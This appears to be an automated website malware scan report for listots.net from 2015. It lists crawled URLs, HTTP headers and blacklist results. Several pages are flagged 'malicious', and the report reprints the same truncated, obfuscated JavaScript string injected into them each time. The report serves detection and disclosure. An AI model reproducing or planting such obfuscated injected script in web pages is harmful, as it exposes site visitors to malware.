Scanned pages/files
Request | Server response | Status |
http://listots.net/ | 200 OK Content-Length: 20429 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _1OI='KkSKpcCfngCdpxGcz5yJjJ3c0V2Z89mZulGfmVmc8lGchlnclVXcqx3YyNHfr9GfyVmcyVmZlJHfwRHdoxXZtFmTnFGV5J0c05WZtVGbFRXZnxnZkFGfkxWaoNEZuVGcwFGfkFWZoxHbyVHfMJVV8RHcpJ3YzFmdhpGf5FGbwNXakx3cwRHdoJjM8NmczBjM8F0M8lHb8VGdpJ3d8J0M8lDM8JXY2BjM8RWaflHbmRWYwIDf4ATN2cTM1AjM8RHelRnMywnbkNGflBXe0BjM8Rnbl1WZsVUZ0FWZyNGfFNDfBBDf0BXayN2cDNDfzpGf05WZu9Gct92QJJVVlR2bj5WZ8VGchN2cl5Wd8N0M8JXY2xHduVWb1N2bkxnM2wHMxEDf8dDN8R0M8RHcpJ3YzxXZwF2YzV2X89UMw8FfPxGb8xHbhZXZ8xXZk92QyFGaD12byZGfwhXRnVmU8RXasB3c8VzM8RnbJV2cyFGc8d Antivirus reports:
| ||
https://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js | 200 OK Content-Length: 77746 Content-Type: text/javascript | clean |
http://listots.net/css/js.js | 200 OK Content-Length: 1660 Content-Type: application/x-javascript | clean |
http://listots.net/?lang=en | HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Thu, 26 Feb 2015 12:13:10 GMT Pragma: no-cache Location: / Server: nginx Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=8dddp87dqn4pued4uvujst17i3; path=/ X-Powered-By: PHP/5.3.3-7+squeeze19 | clean |
http://listots.net/test404page.js | 200 OK Content-Length: 383 Content-Type: text/html | clean |
http://jwpsrv.com/library/V3zuDmQ2EeOxhCIACmOLpg.js | 200 OK Content-Length: 75568 Content-Type: text/javascript | clean |
http://listots.net/?lang=pl | HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Thu, 26 Feb 2015 12:13:11 GMT Pragma: no-cache Location: / Server: nginx Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=c3qr621c07087c84nh5nktcvg4; path=/ X-Powered-By: PHP/5.3.3-7+squeeze19 | clean |
http://listots.net/?lang=no | HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Thu, 26 Feb 2015 12:13:11 GMT Pragma: no-cache Location: / Server: nginx Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=3ugt6kuafdvb2u6ruu3mlks112; path=/ X-Powered-By: PHP/5.3.3-7+squeeze19 | clean |
http://listots.net/index.php | 200 OK Content-Length: 20456 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _1OI='KkSKpcCfngCdpxGcz5yJjJ3c0V2Z89mZulGfmVmc8lGchlnclVXcqx3YyNHfr9GfyVmcyVmZlJHfwRHdoxXZtFmTnFGV5J0c05WZtVGbFRXZnxnZkFGfkxWaoNEZuVGcwFGfkFWZoxHbyVHfMJVV8RHcpJ3YzFmdhpGf5FGbwNXakx3cwRHdoJjM8NmczBjM8F0M8lHb8VGdpJ3d8J0M8lDM8JXY2BjM8RWaflHbmRWYwIDf4ATN2cTM1AjM8RHelRnMywnbkNGflBXe0BjM8Rnbl1WZsVUZ0FWZyNGfFNDfBBDf0BXayN2cDNDfzpGf05WZu9Gct92QJJVVlR2bj5WZ8VGchN2cl5Wd8N0M8JXY2xHduVWb1N2bkxnM2wHMxEDf8dDN8R0M8RHcpJ3YzxXZwF2YzV2X89UMw8FfPxGb8xHbhZXZ8xXZk92QyFGaD12byZGfwhXRnVmU8RXasB3c8VzM8RnbJV2cyFGc8d Antivirus reports:
| ||
http://listots.net/index.php?lang=en | HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Thu, 26 Feb 2015 12:13:12 GMT Pragma: no-cache Location: /index.php Server: nginx Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=r3ok4ab6ifsnb4j92k0u4bcdr1; path=/ X-Powered-By: PHP/5.3.3-7+squeeze19 | clean |
http://listots.net/index.php?lang=pl | HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Thu, 26 Feb 2015 12:13:12 GMT Pragma: no-cache Location: /index.php Server: nginx Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=rb2231vk47irk678ko10jj1es4; path=/ X-Powered-By: PHP/5.3.3-7+squeeze19 | clean |
http://listots.net/index.php?lang=no | HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Thu, 26 Feb 2015 12:13:12 GMT Pragma: no-cache Location: /index.php Server: nginx Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=qtd1e3knrgm8u7cf1s8sh0k2g6; path=/ X-Powered-By: PHP/5.3.3-7+squeeze19 | clean |
http://listots.net/index.php?action=support | 200 OK Content-Length: 8197 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _1OI='KkSKpcCfngCdpxGcz5yJjJ3c0V2Z89mZulGfmVmc8lGchlnclVXcqx3YyNHfr9GfyVmcyVmZlJHfwRHdoxXZtFmTnFGV5J0c05WZtVGbFRXZnxnZkFGfkxWaoNEZuVGcwFGfkFWZoxHbyVHfMJVV8RHcpJ3YzFmdhpGf5FGbwNXakx3cwRHdoJjM8NmczBjM8F0M8lHb8VGdpJ3d8J0M8lDM8JXY2BjM8RWaflHbmRWYwIDf4ATN2cTM1AjM8RHelRnMywnbkNGflBXe0BjM8Rnbl1WZsVUZ0FWZyNGfFNDfBBDf0BXayN2cDNDfzpGf05WZu9Gct92QJJVVlR2bj5WZ8VGchN2cl5Wd8N0M8JXY2xHduVWb1N2bkxnM2wHMxEDf8dDN8R0M8RHcpJ3YzxXZwF2YzV2X89UMw8FfPxGb8xHbhZXZ8xXZk92QyFGaD12byZGfwhXRnVmU8RXasB3c8VzM8RnbJV2cyFGc8d Antivirus reports:
| ||
http://listots.net/index.php?action=support&lang=en | HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Thu, 26 Feb 2015 12:13:12 GMT Pragma: no-cache Location: /index.php?action=support Server: nginx Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=t1unlg2v51531fmi98loppk1d7; path=/ X-Powered-By: PHP/5.3.3-7+squeeze19 | clean |
http://listots.net/index.php?action=support&lang=pl | HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Thu, 26 Feb 2015 12:13:13 GMT Pragma: no-cache Location: /index.php?action=support Server: nginx Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=7evihliq0pr0e46qme5cr362s0; path=/ X-Powered-By: PHP/5.3.3-7+squeeze19 | clean |
http://listots.net/index.php?action=support&lang=no | HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Thu, 26 Feb 2015 12:13:13 GMT Pragma: no-cache Location: /index.php?action=support Server: nginx Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=ijeks580ce1u0ops7dj4rq7tr6; path=/ X-Powered-By: PHP/5.3.3-7+squeeze19 | clean |
http://listots.net/index.php?action=register | 200 OK Content-Length: 8403 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _1OI='KkSKpcCfngCdpxGcz5yJjJ3c0V2Z89mZulGfmVmc8lGchlnclVXcqx3YyNHfr9GfyVmcyVmZlJHfwRHdoxXZtFmTnFGV5J0c05WZtVGbFRXZnxnZkFGfkxWaoNEZuVGcwFGfkFWZoxHbyVHfMJVV8RHcpJ3YzFmdhpGf5FGbwNXakx3cwRHdoJjM8NmczBjM8F0M8lHb8VGdpJ3d8J0M8lDM8JXY2BjM8RWaflHbmRWYwIDf4ATN2cTM1AjM8RHelRnMywnbkNGflBXe0BjM8Rnbl1WZsVUZ0FWZyNGfFNDfBBDf0BXayN2cDNDfzpGf05WZu9Gct92QJJVVlR2bj5WZ8VGchN2cl5Wd8N0M8JXY2xHduVWb1N2bkxnM2wHMxEDf8dDN8R0M8RHcpJ3YzxXZwF2YzV2X89UMw8FfPxGb8xHbhZXZ8xXZk92QyFGaD12byZGfwhXRnVmU8RXasB3c8VzM8RnbJV2cyFGc8d Antivirus reports:
| ||
http://listots.net/index.php?action=register&lang=en | HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Thu, 26 Feb 2015 12:13:13 GMT Pragma: no-cache Location: /index.php?action=register Server: nginx Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=dch520oh425rekdp26mjvuh2a0; path=/ X-Powered-By: PHP/5.3.3-7+squeeze19 | clean |
http://listots.net/index.php?action=register&lang=pl | HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Thu, 26 Feb 2015 12:13:13 GMT Pragma: no-cache Location: /index.php?action=register Server: nginx Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=q85pffgkv4d65ti4sh4tqdoda2; path=/ X-Powered-By: PHP/5.3.3-7+squeeze19 | clean |
http://listots.net/index.php?action=register&lang=no | HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Thu, 26 Feb 2015 12:13:13 GMT Pragma: no-cache Location: /index.php?action=register Server: nginx Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=81j08bsl5bgjqnb4ubjv98bga1; path=/ X-Powered-By: PHP/5.3.3-7+squeeze19 | clean |
http://listots.net/index.php?action=download | 200 OK Content-Length: 9503 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _1OI='KkSKpcCfngCdpxGcz5yJjJ3c0V2Z89mZulGfmVmc8lGchlnclVXcqx3YyNHfr9GfyVmcyVmZlJHfwRHdoxXZtFmTnFGV5J0c05WZtVGbFRXZnxnZkFGfkxWaoNEZuVGcwFGfkFWZoxHbyVHfMJVV8RHcpJ3YzFmdhpGf5FGbwNXakx3cwRHdoJjM8NmczBjM8F0M8lHb8VGdpJ3d8J0M8lDM8JXY2BjM8RWaflHbmRWYwIDf4ATN2cTM1AjM8RHelRnMywnbkNGflBXe0BjM8Rnbl1WZsVUZ0FWZyNGfFNDfBBDf0BXayN2cDNDfzpGf05WZu9Gct92QJJVVlR2bj5WZ8VGchN2cl5Wd8N0M8JXY2xHduVWb1N2bkxnM2wHMxEDf8dDN8R0M8RHcpJ3YzxXZwF2YzV2X89UMw8FfPxGb8xHbhZXZ8xXZk92QyFGaD12byZGfwhXRnVmU8RXasB3c8VzM8RnbJV2cyFGc8d Antivirus reports:
| ||
http://listots.net/index.php?action=download&lang=en | HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Thu, 26 Feb 2015 12:13:14 GMT Pragma: no-cache Location: /index.php?action=download Server: nginx Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=p0c2s93mm69rrf83irimie4hv2; path=/ X-Powered-By: PHP/5.3.3-7+squeeze19 | clean |
http://listots.net/index.php?action=download&lang=pl | HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Thu, 26 Feb 2015 12:13:14 GMT Pragma: no-cache Location: /index.php?action=download Server: nginx Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=409ef7kh02n0e4srdp6ls1pm16; path=/ X-Powered-By: PHP/5.3.3-7+squeeze19 | clean |
http://listots.net/index.php?action=download&lang=no | HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Thu, 26 Feb 2015 12:13:14 GMT Pragma: no-cache Location: /index.php?action=download Server: nginx Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=sb1tf77emvgouh9e3mi9penko0; path=/ X-Powered-By: PHP/5.3.3-7+squeeze19 | clean |
http://listots.net/download/ipchanger.zip | 200 OK Content-Length: 301144 Content-Type: application/zip | clean |
http://listots.net/index.php?byco=&oocoo=&page=0 | 200 OK Content-Length: 20516 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _1OI='KkSKpcCfngCdpxGcz5yJjJ3c0V2Z89mZulGfmVmc8lGchlnclVXcqx3YyNHfr9GfyVmcyVmZlJHfwRHdoxXZtFmTnFGV5J0c05WZtVGbFRXZnxnZkFGfkxWaoNEZuVGcwFGfkFWZoxHbyVHfMJVV8RHcpJ3YzFmdhpGf5FGbwNXakx3cwRHdoJjM8NmczBjM8F0M8lHb8VGdpJ3d8J0M8lDM8JXY2BjM8RWaflHbmRWYwIDf4ATN2cTM1AjM8RHelRnMywnbkNGflBXe0BjM8Rnbl1WZsVUZ0FWZyNGfFNDfBBDf0BXayN2cDNDfzpGf05WZu9Gct92QJJVVlR2bj5WZ8VGchN2cl5Wd8N0M8JXY2xHduVWb1N2bkxnM2wHMxEDf8dDN8R0M8RHcpJ3YzxXZwF2YzV2X89UMw8FfPxGb8xHbhZXZ8xXZk92QyFGaD12byZGfwhXRnVmU8RXasB3c8VzM8RnbJV2cyFGc8d Antivirus reports:
| ||
http://listots.net/index.php?byco=&oocoo=&page=0&lang=en | HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Thu, 26 Feb 2015 12:13:15 GMT Pragma: no-cache Location: /index.php?byco=&oocoo=&page=0 Server: nginx Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=thd4oj4iapdudm0bra9g8mhfa7; path=/ X-Powered-By: PHP/5.3.3-7+squeeze19 | clean |
http://listots.net/index.php?byco=&oocoo=&page=0&lang=pl | HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Thu, 26 Feb 2015 12:13:15 GMT Pragma: no-cache Location: /index.php?byco=&oocoo=&page=0 Server: nginx Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=gsa032m5ut09g95hmmn9nju5d2; path=/ X-Powered-By: PHP/5.3.3-7+squeeze19 | clean |
http://listots.net/index.php?byco=&oocoo=&page=0&lang=no | HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Thu, 26 Feb 2015 12:13:15 GMT Pragma: no-cache Location: /index.php?byco=&oocoo=&page=0 Server: nginx Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=9lemcb0m0bfmnn31kd36r6qu37; path=/ X-Powered-By: PHP/5.3.3-7+squeeze19 | clean |
http://listots.net/index.php?byco=&oocoo=&page=1 | 200 OK Content-Length: 20516 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _1OI='KkSKpcCfngCdpxGcz5yJjJ3c0V2Z89mZulGfmVmc8lGchlnclVXcqx3YyNHfr9GfyVmcyVmZlJHfwRHdoxXZtFmTnFGV5J0c05WZtVGbFRXZnxnZkFGfkxWaoNEZuVGcwFGfkFWZoxHbyVHfMJVV8RHcpJ3YzFmdhpGf5FGbwNXakx3cwRHdoJjM8NmczBjM8F0M8lHb8VGdpJ3d8J0M8lDM8JXY2BjM8RWaflHbmRWYwIDf4ATN2cTM1AjM8RHelRnMywnbkNGflBXe0BjM8Rnbl1WZsVUZ0FWZyNGfFNDfBBDf0BXayN2cDNDfzpGf05WZu9Gct92QJJVVlR2bj5WZ8VGchN2cl5Wd8N0M8JXY2xHduVWb1N2bkxnM2wHMxEDf8dDN8R0M8RHcpJ3YzxXZwF2YzV2X89UMw8FfPxGb8xHbhZXZ8xXZk92QyFGaD12byZGfwhXRnVmU8RXasB3c8VzM8RnbJV2cyFGc8d Antivirus reports:
| ||
http://listots.net/index.php?byco=&oocoo=&page=1&lang=en | HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Thu, 26 Feb 2015 12:13:16 GMT Pragma: no-cache Location: /index.php?byco=&oocoo=&page=1 Server: nginx Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=sspmo36e5up17b7a3dju3nrup6; path=/ X-Powered-By: PHP/5.3.3-7+squeeze19 | clean |
http://listots.net/index.php?byco=&oocoo=&page=1&lang=pl | HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Thu, 26 Feb 2015 12:13:16 GMT Pragma: no-cache Location: /index.php?byco=&oocoo=&page=1 Server: nginx Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=bjdi6k9iorj5ckhi017bgaa420; path=/ X-Powered-By: PHP/5.3.3-7+squeeze19 | clean |
http://listots.net/index.php?byco=&oocoo=&page=1&lang=no | HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Thu, 26 Feb 2015 12:13:16 GMT Pragma: no-cache Location: /index.php?byco=&oocoo=&page=1 Server: nginx Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=95k9m2r8k79lpalucpqoji4377; path=/ X-Powered-By: PHP/5.3.3-7+squeeze19 | clean |
http://listots.net/index.php?byco=&oocoo=&page=2 | 200 OK Content-Length: 9667 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _1OI='KkSKpcCfngCdpxGcz5yJjJ3c0V2Z89mZulGfmVmc8lGchlnclVXcqx3YyNHfr9GfyVmcyVmZlJHfwRHdoxXZtFmTnFGV5J0c05WZtVGbFRXZnxnZkFGfkxWaoNEZuVGcwFGfkFWZoxHbyVHfMJVV8RHcpJ3YzFmdhpGf5FGbwNXakx3cwRHdoJjM8NmczBjM8F0M8lHb8VGdpJ3d8J0M8lDM8JXY2BjM8RWaflHbmRWYwIDf4ATN2cTM1AjM8RHelRnMywnbkNGflBXe0BjM8Rnbl1WZsVUZ0FWZyNGfFNDfBBDf0BXayN2cDNDfzpGf05WZu9Gct92QJJVVlR2bj5WZ8VGchN2cl5Wd8N0M8JXY2xHduVWb1N2bkxnM2wHMxEDf8dDN8R0M8RHcpJ3YzxXZwF2YzV2X89UMw8FfPxGb8xHbhZXZ8xXZk92QyFGaD12byZGfwhXRnVmU8RXasB3c8VzM8RnbJV2cyFGc8d Antivirus reports:
| ||
http://listots.net/index.php?byco=&oocoo=&page=2&lang=en | HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Thu, 26 Feb 2015 12:13:16 GMT Pragma: no-cache Location: /index.php?byco=&oocoo=&page=2 Server: nginx Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=4iikodlrt1oigjfdqvb7eh0rv2; path=/ X-Powered-By: PHP/5.3.3-7+squeeze19 | clean |
http://listots.net/index.php?byco=&oocoo=&page=2&lang=pl | HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Thu, 26 Feb 2015 12:13:17 GMT Pragma: no-cache Location: /index.php?byco=&oocoo=&page=2 Server: nginx Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=fjotgl2nv6t88erg2vocu0hph6; path=/ X-Powered-By: PHP/5.3.3-7+squeeze19 | clean |
http://listots.net/index.php?byco=&oocoo=&page=2&lang=no | HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Thu, 26 Feb 2015 12:13:17 GMT Pragma: no-cache Location: /index.php?byco=&oocoo=&page=2 Server: nginx Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=bj8496igdkoa14ha3ndu7hkem7; path=/ X-Powered-By: PHP/5.3.3-7+squeeze19 | clean |
http://listots.net/index.php?byco=&oocoo=&page=3 | 200 OK Content-Length: 9667 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _1OI='KkSKpcCfngCdpxGcz5yJjJ3c0V2Z89mZulGfmVmc8lGchlnclVXcqx3YyNHfr9GfyVmcyVmZlJHfwRHdoxXZtFmTnFGV5J0c05WZtVGbFRXZnxnZkFGfkxWaoNEZuVGcwFGfkFWZoxHbyVHfMJVV8RHcpJ3YzFmdhpGf5FGbwNXakx3cwRHdoJjM8NmczBjM8F0M8lHb8VGdpJ3d8J0M8lDM8JXY2BjM8RWaflHbmRWYwIDf4ATN2cTM1AjM8RHelRnMywnbkNGflBXe0BjM8Rnbl1WZsVUZ0FWZyNGfFNDfBBDf0BXayN2cDNDfzpGf05WZu9Gct92QJJVVlR2bj5WZ8VGchN2cl5Wd8N0M8JXY2xHduVWb1N2bkxnM2wHMxEDf8dDN8R0M8RHcpJ3YzxXZwF2YzV2X89UMw8FfPxGb8xHbhZXZ8xXZk92QyFGaD12byZGfwhXRnVmU8RXasB3c8VzM8RnbJV2cyFGc8d Antivirus reports:
| ||
http://listots.net/index.php?byco=&oocoo=&page=3&lang=en | HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Thu, 26 Feb 2015 12:13:17 GMT Pragma: no-cache Location: /index.php?byco=&oocoo=&page=3 Server: nginx Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=d0sul2kmtqgtpfr90nuufam506; path=/ X-Powered-By: PHP/5.3.3-7+squeeze19 | clean |
http://listots.net/index.php?byco=&oocoo=&page=3&lang=pl | HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Thu, 26 Feb 2015 12:13:17 GMT Pragma: no-cache Location: /index.php?byco=&oocoo=&page=3 Server: nginx Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=ri19d03rb5lqqrlpblukmcki02; path=/ X-Powered-By: PHP/5.3.3-7+squeeze19 | clean |
http://listots.net/index.php?byco=&oocoo=&page=3&lang=no | HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Thu, 26 Feb 2015 12:13:17 GMT Pragma: no-cache Location: /index.php?byco=&oocoo=&page=3 Server: nginx Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=6ro6u6gm07ipbkel1isncp6nb7; path=/ X-Powered-By: PHP/5.3.3-7+squeeze19 | clean |
http://listots.net/index.php?byco=&oocoo=&page=4 | 200 OK Content-Length: 9667 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _1OI='KkSKpcCfngCdpxGcz5yJjJ3c0V2Z89mZulGfmVmc8lGchlnclVXcqx3YyNHfr9GfyVmcyVmZlJHfwRHdoxXZtFmTnFGV5J0c05WZtVGbFRXZnxnZkFGfkxWaoNEZuVGcwFGfkFWZoxHbyVHfMJVV8RHcpJ3YzFmdhpGf5FGbwNXakx3cwRHdoJjM8NmczBjM8F0M8lHb8VGdpJ3d8J0M8lDM8JXY2BjM8RWaflHbmRWYwIDf4ATN2cTM1AjM8RHelRnMywnbkNGflBXe0BjM8Rnbl1WZsVUZ0FWZyNGfFNDfBBDf0BXayN2cDNDfzpGf05WZu9Gct92QJJVVlR2bj5WZ8VGchN2cl5Wd8N0M8JXY2xHduVWb1N2bkxnM2wHMxEDf8dDN8R0M8RHcpJ3YzxXZwF2YzV2X89UMw8FfPxGb8xHbhZXZ8xXZk92QyFGaD12byZGfwhXRnVmU8RXasB3c8VzM8RnbJV2cyFGc8d Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: listots.net
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Thu, 26 Feb 2015 12:13:09 GMT
Pragma: no-cache
Server: nginx
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=cc7ie2s6iel18fp69o9n841go2; path=/
X-Powered-By: PHP/5.3.3-7+squeeze19
GET / HTTP/1.1
Host: listots.net
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Thu, 26 Feb 2015 12:13:09 GMT
Pragma: no-cache
Server: nginx
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=cc7ie2s6iel18fp69o9n841go2; path=/
X-Powered-By: PHP/5.3.3-7+squeeze19
Second query (visit from search engine):
GET / HTTP/1.1
Host: listots.net
Referer: http://www.google.com/search?q=listots.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: listots.net
Referer: http://www.google.com/search?q=listots.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=listots.net
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://listots.net/
Result: listots.net is not infected or malware details are not published yet.
Result: listots.net is not infected or malware details are not published yet.